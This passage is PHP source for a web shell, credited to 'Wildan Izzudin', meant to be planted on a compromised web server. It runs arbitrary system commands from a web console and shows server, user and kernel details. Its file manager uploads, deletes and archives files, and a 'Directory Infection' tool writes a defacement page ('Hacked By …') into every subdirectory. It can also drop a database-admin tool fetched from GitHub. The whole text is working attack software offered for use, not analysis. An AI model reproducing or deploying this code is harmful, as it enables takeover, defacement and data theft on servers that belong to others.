case (function_exists('passthru')):
@ob_start();
@passthru($corey);
$corex = @ob_get_contents();
@ob_end_clean();
return $corex;
break;
case (function_exists('shell_exec')):
$corex = @shell_exec($corey);
return $corex;
}
}
function disk($dz) {
switch (true) {
case ($dz >= 1073741824): return sprintf('%1.2f', $dz / 1073741824) . ' GB';
break;
case ($dz >= 1048576): return sprintf('%1.2f', $dz / 1048576) . ' MB';
break;
case ($dz >= 1024): return sprintf('%1.2f', $dz / 1024) . ' KB';
break;
default: return $dz . ' B';
}
}
function fuck($b_ms, $c_ms, $d_ms) {
if (strpos($b_ms, $c_ms) === FALSE) return FALSE;
if (strpos($b_ms, $d_ms) === FALSE) return FALSE;
$a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
$e_ms = strpos($b_ms, $d_ms, $a_ms);
$f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
return $f_ms;
}
$safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
$disablefunc = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
$curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
$wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
$perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
$python = (exe('python --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
$disfunc = (!empty($disablefunc)) ? "<span class='label-danger'>" . $disablefunc . "</span>" : "<span class='label-success'>NONE</span>";
switch (true) {
case (!function_exists('posix_getegid')):
$_cox = @get_current_user();
$_cid = @getmyuid();
$_ccr = @getmygid();
$_cum = "?";
break;
default:
$_cid = @posix_getpwuid(posix_geteuid());
$_ccr = @posix_getgrgid(posix_getegid());
$_cox = $_cid['name'];
$_cid = $_cid['uid'];
$_cum = $_ccr['name'];
$_ccr = $_ccr['gid'];
}
print '<div class="coL-panel">
<table>
<td class="td-panel">
<center>
<div class="loader"></div>
</center>
</td>
<td class="td-panel-right">SYSTEM INFORMATION</td>
</table>
</div>';
print "<div id='paksa'><table width=100% class='table-info' cellspacing=0>
<th class=th-info style=width:120px>
<center>Component</center>
</th>
<th class=th-info>
<center>Arrow</center>
</th>
<th class=th-info break>
<center>Result</center>
</th>
</tr>
<tr class='ex-hov'>
<td class='td-info' style='width:130px'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Server </td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . $_SERVER['SERVER_SOFTWARE'] . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Username
</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . $_cox . " [" . $_cid . "]</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Group
</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>" . $_cum . " [" . $_ccr . "]</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Server IP </td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>" . gethostbyname($_SERVER['HTTP_HOST']) . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Your IP </td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . $_SERVER['REMOTE_ADDR'] . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> PHP Version</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . @phpversion() . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Disk Space</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>[" . disk(disk_free_space(getcwd())) . "] / [" . disk(disk_total_space(getcwd())) . "]</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Safe Mode</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> $safemode</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> MySQL</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>$mysql</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Perl
</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> $perl </td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Python</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>$python</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> WGET</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>$wget</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> CURL</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>$curl</td>
</tr>";
print '</table></div>
<div class="coL-panel top">
<table>
<td class="td-panel">
<center>
<div class="loader"></div>
</center>
</td>
<td class="td-panel-right">KERNEL</td>
</table>
</div>';
print "<div class='coL-option' style='margin-bottom:3px;padding:7px'>" . php_uname() . "</div>";
print '<div class="coL-panel top">
<table>
<td class="td-panel">
<center>
<div class="loader"></div>
</center>
</td>
<td class="td-panel-right">DISABLE FUNCTION</td>
</table>
</div>';
print "<div class='coL-option wrap break' style='padding:7px'>" . $disfunc . "</div>
</div>";
break;
case 'infection':
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">DIRECTORY INFECTION</td></table></div>';
print "<form action='?" . x7 . "infection&". x5.$dir. "' method='post' style='padding:0;margin:0'>";
print '<div class="coL-option">';
print "<table cellspacing='0' cellpadding='3'><td align='left' style='padding:7px;width:60px'>
Root :</td><td><input type='text' name='base_dir' value='".getcwd()."'></td></tr>";
print "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
print "</div>";
if (isset ($_UNDERXPLOIT['base_dir'])) {
switch (true) {
case (!file_exists ($_UNDERXPLOIT['base_dir'])) : bacot('Destination not found');
}
@chdir ($_UNDERXPLOIT['base_dir']) or die ('jembut');
$files = @scandir ($_UNDERXPLOIT['base_dir']) or die ("Oh Shit !!<br>");
foreach ($files as $file):
if ($file != "." && $file != ".." && @filetype ($file) == "dir")
{
$index = getcwd ()."/".$file."/".$_UNDERXPLOIT['file_name'];
if (file_put_contents ($index, $_UNDERXPLOIT['index']))
print "
<div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px;font-size:14px'><span class='label-success'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></span> $index </span></div>"; }
endforeach;
} else {
print "<div id='paksa'><textarea name='index' class='lined'># Hacked By Wildan Izzudin !!</textarea>";
print '<script type="text/javascript">
$(function() {
$(".lined").linedtextarea({selectedLine: 1});
}); </script>';
print "<input type='submit' value='INFECT' class='btn-exe' style='width:100%;margin-top:3px'></div>";
}
print "</form></div>";
break;
case 'cmd': print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CONSOLE</td></table></div>';
print '<div class="coL-option">';
print '<pre style="font-family: Play;min-height:200px;font-size:14px;padding:7px" class="label-success">';
if(isset($_UNDERXPLOIT['cmd']) && $_UNDERXPLOIT['cmd']!='') {
$exec = jmbt(system($_UNDERXPLOIT['cmd'].' 2>&1'));
switch ($exec) {
case NULL:
header('location: ?' . x5 . $dir);
break;
default:
}
}
print '</pre>
<script type="text/javascript"> function gp() {
if(document.getElementById("csl").value == ""){'; s('Enter your command');
print 'return false;
} document.getElementById("egv").submit();
} </script>
<table style="margin-top:7px" cellspacing="0"><form method="POST" action="?' . x7 . 'cmd&' . x5 . $dir . '">
<td align="center" style="width:10%"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></td>
<td style="width:70%;padding-left:3px;padding-right:3px"><input type="text" placeholder="$" name="cmd" id="csl"></td><td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="gp(); return false;"><i class="zmdi zmdi-long-arrow-return zmdi-hc-fw"></i></button></form></td>
</table></div></div>';
break;
case 'error': print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
bacot('Permission denied'); print x9;
break;
default:
$ddir = @getcwd();
if (isset($_UNDERXPLOIT['from']))
@chdir($_UNDERXPLOIT['from']);
$cwd = @getcwd();
switch ($os) {
case ('win'):
$ddir = str_replace("\\", "/", $ddir);
$cwd = str_replace("\\", "/", $cwd);
break;
} if ($cwd[strlen($cwd) - 1] != '/') $cwd.= '/';
function hs($str) {
switch (true) {
case (function_exists("scandir")): return scandir($str);
break;
default: $cdm = opendir($str);
while (false !== ($filename = readdir($cdm))) $data[] = $filename;
return $data;
}
}
if (!empty($_COOKIE['target'])) $_COOKIE['target'] = @unserialize($_COOKIE['target']);
if (!empty($_UNDERXPLOIT['hcx'])) {
switch ($_UNDERXPLOIT['hcx']) {
case 'delete': function deleteDir($path) {
$path = (substr($path, -1) == '/') ? $path : $path . '/';
$cdm = opendir($path);
while (($â–Ÿ = readdir($cdm)) !== false) {
$â–Ÿ = $path . $â–Ÿ;
if ((basename($â–Ÿ) == "..") || (basename($â–Ÿ) == ".")) continue;
$type = filetype($â–Ÿ);
if ($type == "dir") deleteDir($â–Ÿ); else @unlink($â–Ÿ);
}
closedir($cdm);
@rmdir($path);
}
if (is_array(@$_UNDERXPLOIT['target']))
foreach($_UNDERXPLOIT['target'] as $f) {
if ($f == '..') continue;
$f = urldecode($f);
if (is_dir($f)) deleteDir($f); else @unlink($f);
}
break;
case 'paste':
if ($_COOKIE['act'] == 'copy') {
function copas($c, $s, $d) {
if (is_dir($c . $s)) { mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != "..")) copas($c . $s . '/', $f, $d . $s . '/');
} else if (is_file($c . $s)) @copy($c . $s, $d . $s);
}
foreach($_COOKIE['target'] as $f) copas($_COOKIE['from'], $f, $GLOBALS['cwd']);
}
elseif ($_COOKIE['act'] == 'move') {
function mopas($c, $s, $d) {
if (is_dir($c . $s)) { mkdir($d . $s);
$h = @opendir($c . $s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != "..")) copas($c . $s . '/', $f, $d . $s . '/');
} elseif (@is_file($c . $s)) @copy($c . $s, $d . $s);
}
foreach($_COOKIE['target'] as $f) @rename($_COOKIE['from'] . $f, $GLOBALS['cwd'] . $f);
}
elseif ($_COOKIE['act'] == 'zip') {
if (class_exists('ZipArchive')) {
$zip = new ZipArchive();
if ($zip -> open($_UNDERXPLOIT['xpoz'], 1)) {
chdir($_COOKIE['from']);
foreach($_COOKIE['target'] as $f) {
if ($f == '..') continue;
if (@is_file($_COOKIE['from'] . $f)) $zip -> addFile($_COOKIE['from'] . $f, $f);
elseif (@is_dir($_COOKIE['from'] . $f)) {
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS));
foreach($iterator as $key => $value) {
$zip -> addFile(realpath($key) , $key);
}
}
}
chdir($GLOBALS['cwd']);
$zip -> close();
}
}
}
unset($_COOKIE['target']);
setcookie('target', '', time() - 3600);
break;
default:
switch (true) {
case (!empty($_UNDERXPLOIT['hcx'])):
vb('act', $_UNDERXPLOIT['hcx']);
vb('target', serialize(@$_UNDERXPLOIT['target']));
vb('from', @$_UNDERXPLOIT['from']);
}
break;
}
}
print '<script type="text/javascript"> function m1s() {
if(document.getElementById("act").value == "") {';
s('Select action');
print 'return false;
}
document.getElementById("sks").submit();
}
</script>
<form name="data" action="?dir=' . $dir . '" method="POST" style="margin:0px"><div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">FILE MANAGER</td></table></div>';
$dirContent = hs(isset($_UNDERXPLOIT['from']) ? $_UNDERXPLOIT['from'] : $GLOBALS['cwd']);
switch ($dirContent) {
case (false): print '<script type="text/javascript">c("?' . x7 . 'error&' . x5 . $dir . '");</script>';
return;
}
global $sort;
$sort = array(
'name',
1
);
switch (true) {
case (!empty($_UNDERXPLOIT['hcx'])):
if (preg_match('!s_([A-z]+)_(\d{1})!', $_UNDERXPLOIT['hcx'], $match)) $sort = array(
$match[1], (int)$match[2]);
}
print '<script language="JavaScript">
function grow(isChecked) {
if(isChecked) {
$(\'input[name="target[]"]\').each(function() {
this.checked = true;
});
} else {
$(\'input[name="target[]"]\').each(function() {
this.checked = false;
});
}
} </script>';
print '<table class="table-file" cellspacing="0">
<th class="th-file">Name</th>
<th class="th-file" style="width:80px" id="wh">Access</th>
<th class="th-file" style="width:80px">Size</th>
<th class="th-file" style="width:65px">Action</th>
<th class="th-file"></th>
<tr>';
$dir = getcwd();
$scn = scandir($dir);
foreach($scn as $_axu) {
$dtype = filetype("$dir/$_axu");
switch (true) {
case (!is_dir("$dir/$_axu")): continue 2;
break;
}
switch ($_axu) {
case ('..'): $_axe = '<a class="a" onclick=\'c("?' . x5 . dirname($dir) . '")\'>' . $_axu . '</a>';
break;
case ('.'): $_axe = '<a class="a" onclick=\'c("?' . x5 . $dir . '")\'>' . $_axu . '</a>';
break;
default: $_axe = '<a class="a" onclick=\'c("?dir=' . $dir . '/' . $_axu . '")\'>' . $_axu . '</a>';
$xdir += 1;
}
switch (true) {
case($_axu == '.' || $_axu == '..'): $_axo = '--';
$ckh = '<label><input type="checkbox" disabled><span class="icon"><i class="zmdi zmdi-check zmdi-hc-fw"></i></span></label>';
break;
default: $_axo = '<a class="a" id="button-'.crc32($_axu).'">OPTIONS</a>';
$ckh = '<label><input type="checkbox" value="' . basename($_axu) . '" name="target[]"><span class="icon"><i class="zmdi zmdi-check zmdi-hc-fw"></i></span></label>';
}
print '<tr>';
print '<td class="td-file elip"><i class="zmdi zmdi-folder-outline zmdi-hc-fw"></i> [ ' . $_axe . ' ]</td>';
print '<td align="center" id="wh" class="td-file">' . perms($_axu) . '</td>';
print '<td align="center" class="td-file"><center>--</center></th>';
print '<td align="center" class="td-file"> ' . $_axo . '</td>';
print "<div id='cr-".crc32($_axu)."' class='hidden'>
<a onclick=\"c('?" . x7 . "upload&" . x5 . $dir . "/" . $_axu . "')\"><i class='zmdi zmdi-upload zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "renadir&" . x5 . $dir . "/" . $_axu . "')\"><i class='zmdi zmdi-flip zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "chmdir&" . x5 . $dir . "/" . $_axu . "')\"><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "deledir&" . x5 . $dir . "/" . $_axu . "')\"><i class='zmdi zmdi-delete zmdi-hc-fw'></i></a>
</div>";
print '<td align="center" class="td-file" style="width:10px"><label for="'. $file . '">' . $ckh . '</td>';
print "<script type='text/javascript'>
$('#button-".crc32($_axu)."').toolbar({
content: '#cr-".crc32($_axu)."',
position: 'top',
style: 'dark',
event: 'click',
hideOnClick: true,
adjustment: 28
});</script>";
}
print '</tr>';
foreach($scn as $file) {
$ftype = filetype("$dir/$file");
$ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
$size = filesize("$dir/$file") / 1024;
$size = round($size, 3);
switch (true) {
case ($size > 1024): $size = round($size / 1024, 2) . 'MB';
break;
default: $size = $size . 'KB';
}
switch (true) {
case (!is_file("$dir/$file")): continue 2;
break;
}
print '<tr>';
print '<td class="td-file elip"><i class="zmdi zmdi-file zmdi-hc-fw"></i> <a class="a" onclick="c(\'?' . x7 . 'view&' . x5 . $dir . '&' . x6 . $dir . '/' . $file . '\')">';
$xfile += 1;
switch ($file) {
case (basename($_SERVER['PHP_SELF'])): $aing = '<span class="label-success">' . $file . '</font>';
break;
default: $aing = $file;
}
print $aing . '</label></a></td>';
print "<td align='center' class='td-file' id='wh'>".perms($dir."/".$file)."</td>";
print "<td align='center' class='td-file'>" . $size . "</td>";
print "<div id='cr-".crc32($file)."' class='hidden'>
<a onclick=\"c('?" . x7 . "view&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-eye zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-edit zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-flip zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "delete&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-delete zmdi-hc-fw'></i></a>
<a onclick=\"c('?" . x7 . "download&" . x5 . $dir . "&" . x6 . $dir . "/" . $file . "')\"><i class='zmdi zmdi-download zmdi-hc-fw'></i></a>
</div>";
print '<td align="center" class="td-file"><a class="a" id="button-'.crc32($file).'">OPTIONS</a></td>';
print "<td align='center' class='td-file' style='width:10px'><label><input type='checkbox' name='target[]' value='" . $file . "'><div class='icon'><i class='zmdi zmdi-check zmdi-hc-fw'></i></div></label></td>";
print "<script type='text/javascript'>
$('#button-".crc32($file)."').toolbar({
content: '#cr-".crc32($file)."',
position: 'top',
style: 'dark',
event: 'click',
hideOnClick: true,
adjustment: 28
});</script>";
}
switch (true) {
case ($xdir == NULL): $ydir = 0;
break;
default: $ydir = $xdir;
}
switch (true) {
case ($xfile == NULL): $yfile = 0;
break;
default: $yfile = $xfile;
}
print "</table>
<table class='table-file'>
<td class='td-file' style='width:40px'><div style='margin-top:1px'><span class='lawb' onclick='nflo()' style='width:20px'><i class='zmdi zmdi-menu zmdi-hc-fw'></i></span></div></td>
<td class='td-file' align='left'><div style='margin-bottom:4px'>DIRECTORY : [ <span class='label-success'>" . $ydir . "</span> ] FILE : [ <span class='label-success'>" . $yfile . "</span> ]</div></td>
</table>
<table style='width:100%;margin-top:2px' cellspacing ='0'>";
print "<td style='width:13%;margin-left:10px'><center><label><input type ='checkbox' id ='actchk' onClick ='grow(this.checked);'><div class='icon'><i class='zmdi zmdi-check-all zmdi-hc-fw'></i></div></label></center></td>";
print "<input type ='hidden' name ='ne' value =''>";
print "<input type ='hidden' name ='from' value ='" . htmlspecialchars($GLOBALS['cwd']) . "'>";
print "<input type ='hidden' name ='charset' value ='" . (isset($_UNDERXPLOIT['charset']) ? $_UNDERXPLOIT['charset'] : '') . "'>";
print "<td style='width:70%'>
<select name='hcx' style='width:100%' id='act'>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['target']))
print "<option value ='paste'>Paste</option>";
print "<option value =''>-- Select Action --</option>";
print "<option value ='copy'>Copy</option>";
print "<option value ='move'>Move</option>";
print "<option value ='delete'>Delete</option>";
if (class_exists('ZipArchive'))
print "<option value ='zip'>Compress (.zip)</option>";
print "</select></td>";
if (!empty($_COOKIE['act']) && @count($_COOKIE['target']) && (($_COOKIE['act'] == 'zip')))
print "<input class='top' type='text' name='xpoz' value='" . rand(0, 100) . "-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "' style='background:none;border:0;border-left:3px solid #1D9D73;margin-left:5px'>";
print "<td style='width:20%;text-align:right;padding-left:3px;padding-right:2px'><button type='submit' onclick='m1s(); return false;' class='btn-exe'><i class='zmdi zmdi-long-arrow-return zmdi-hc-fw'></i></button></td></form></table>";
if (isset($_UNDERXPLOIT['ndir'])) {
$cdir = $_UNDERXPLOIT['newinput'];
switch (true) {
case (is_dir($dir . '/' . $cdir)): bacot('Directory already exist');
break;
default: switch (true) {
case (mkdir($dir . '/' . $cdir, 0777)): print '<script type="text/javascript">c("?' . x5 . $dir . '");</script>';
break;
default: bacot('Can\'t create directory');
}
}
}
if (isset($_UNDERXPLOIT['nfil'])) {
$cfile = $_UNDERXPLOIT['newinput'];
switch (true) {
case (file_exists($dir . '/' . $cfile)): bacot('File already exist');
break;
case (fopen($dir . '/' . $cfile, "w+")): print '<script type="text/javascript">c("?' . x7 . 'edit&' . x5 . $dir . '&' . x6 . $dir . '/' . $cfile . '");</script>';
break;
default: bacot('Can\'t create file');
}
}
print '<script language="Javascript">
function cog(){
if(document.forms[\'new\'].newinput.value === "") {';
s('Can\'t be empty');
print 'return false;
}
} </script>';
print '<script type="text/javascript">
function valid(field) {
var re = /^[0-9-A-z.]*$/;
if(!re.test(field.value)) {';
s('Invalid character');
print 'field.value = field.value.replace(/[^0-9-A-z.]/g,"");
}
} </script>';
print '<div id="nflo" style="display:none"><table style="margin-top:3px" cellspacing="0">
<form name="new" action="?'.x5.$dir.'" method="post">
<td style="padding-left:2px"><input type="text" name="newinput" onkeyup="valid(this);"></td>
<td style="padding-left:3px"><button type="submit" class="btn-exe" name="ndir" onclick="return cog();"><i class="zmdi zmdi-folder-outline zmdi-hc-fw"></i></button></td>
<td style="padding-left:3px;padding-right:2px"><button type="submit" class="btn-exe" name="nfil" onclick="return cog();"><i class="zmdi zmdi-file-plus zmdi-hc-fw"></i></button></td>
</form></table></div></div>';
}
print '<script type="text/javascript">
function nflo() {
$("#nflo").slideToggle(500);
} </script>';
print '<div class="coR">
<div class="coR-panel">
<table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">TOOLS</td>
</table>
</div>
<div class="tools-content">';
$path = getcwd();
if (isset($_FILES['data'])) {
switch (true) {
case (copy($_FILES['data']['tmp_name'], $path . '/' . $_FILES['data']['name'])): mtr('?' . x5 . $dir);
bacot('File uploaded succesfully');
break;
default: bacot('Failed to upload file');
}
}
print '<script type="text/javascript"> function upload(){
if(document.getElementById("up").value == ""){';
s('Enter file to upload'); print 'return false;
} document.getElementById("%").submit();
} </script>
<table>
<td align="center" valign="top" style="width:10%;padding-top:11px"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></td>
<td style="width:70%">
<form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td>
<td style="width:20%" valign="top"><button type="submit" class="btn-exe" style="margin-top:1px" onclick="upload();return false;"><i class="zmdi zmdi-long-arrow-right zmdi-hc-fw"></i></button></form>
</td>
</table>';
if (isset($_UNDERXPLOIT['x'])) {
$rse = $_UNDERXPLOIT['file_name'];
$zip = new ZipArchive;
switch ($_UNDERXPLOIT['file_name']) {
case ($rse): switch (true) {
case ($zip -> open($path . '/' . $rse) === TRUE): mtr('?' . x5 . $dir);
$zip -> extractTo($path); $zip -> close();
bacot('Extract successfully');
break;
default: bacot('Permission denied');
}
}
}
print '<script type="text/javascript"> function unzip() {
if(document.getElementById("u").value == ""){'; s('You must choose a zip file');
print 'return false;
} document.getElementById("exzip").submit();
} </script>';
print '<table><form method="POST" action="?' . x5 . $dir . '">
<td align="center" style="width:10%"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></td>
<td style="width:70%"><select name="file_name" id="u">
<option value=""> -- Extractor (.zip) --</option>';
$scandir = scandir($path);
foreach($scandir as $file) {
switch (true) {
case (!is_file("$path/$file")): continue 2;
break;
}
switch (true) {
case (preg_match('/\.zip$/mis', $file)): print '<option>' . $file . '</option>';
}
}
print '</select></td><td style="width:20%;text-align:right"><button id="exzip" type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="zmdi zmdi-long-arrow-return zmdi-hc-fw"></i></button></form></td>
</table>
<script type="text/javascript"> function gv() {
if(document.getElementById("cnsl").value == ""){'; s('Enter your command');
print 'return false;
} document.getElementById("exc").submit();
} </script>
<table style="margin-top:15px"><form method="POST" action="?' . x7 . 'cmd&' . x5 . $dir . '">
<td align="center" style="width:10%"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></td>
<td style="width:70%"><input type="text" placeholder="$" name="cmd" id="cnsl"></td><td style="width:20%;text-align:right"><button type="submit" class="btn-exe" id="exc" onclick="gv();return false;"><i class="zmdi zmdi-long-arrow-return zmdi-hc-fw"></i></button></form></td>
</table>
</div>
<div class="coR-panel top"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MENU</td></table></div>';
print '<div class="tools-content">';
print '<table class="ex-hov"><td class="td-tools-left"><i class="zmdi zmdi-chart-donut zmdi-hc-fw"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a onclick=\'c("?' . x7 . 'system&' . x5 . $dir . '")\'><button class="btn-exe"><i class="zmdi zmdi-long-arrow-right zmdi-hc-fw"></i></button></a></td></table>';
print '<table class="ex-hov"><td class="td-tools-left"><i class="zmdi zmdi-chart-donut zmdi-hc-fw"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a onclick=\'c("?' . x7 . 'upload&' . x5 . $dir . '")\'><button class="btn-exe"><i class="zmdi zmdi-long-arrow-right zmdi-hc-fw"></i></button></a></td></table>';
print '<table class="ex-hov"><td class="td-tools-left"><i class="zmdi zmdi-chart-donut zmdi-hc-fw"></i></td><td class="td-tools-content">Directory Infection</td><td class="td-tools-icon"><a onclick=\'c("?' . x7 . 'infection&' . x5 . $dir . '")\'><button class="btn-exe"><i class="zmdi zmdi-long-arrow-right zmdi-hc-fw"></i></button></a></td></table>';
print '<script type="text/javascript">function create(){
if(document.getElementById("c").value == ""){'; s("Select the file to be created"); print 'return false;
} document.getElementById("jmbt").submit();
} </script>';
switch ($_UNDERXPLOIT['op']) {
case ('1'): switch (true) {
case (op('adminer.php', 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php')): mtr('?' . x5 . $dir);
bacot('File created successfully');
break;
default: bacot('Failed to create file');
}
}
print '<div class="tools-content top" style="padding:5px">';
print '<table><form action="?' . x5 . $dir . '" method="POST"><td align="center" style="width:10%"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></span></td><td style="width:70%"><select name="op" id="c">';
print '<option value=""> -- Create file --</option>';
print '<option value="1">MySQL [ adminer.php ]</option>';
print '</select>
</td>
<td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;" id="jmbt"><i class="zmdi zmdi-long-arrow-return zmdi-hc-fw"></i></button></form>
</td>
</table>
</div>';
print '
</div>
</div>
</div>
<div class="footer">CODED BY WILDAN IZZUDIN</div>';
?>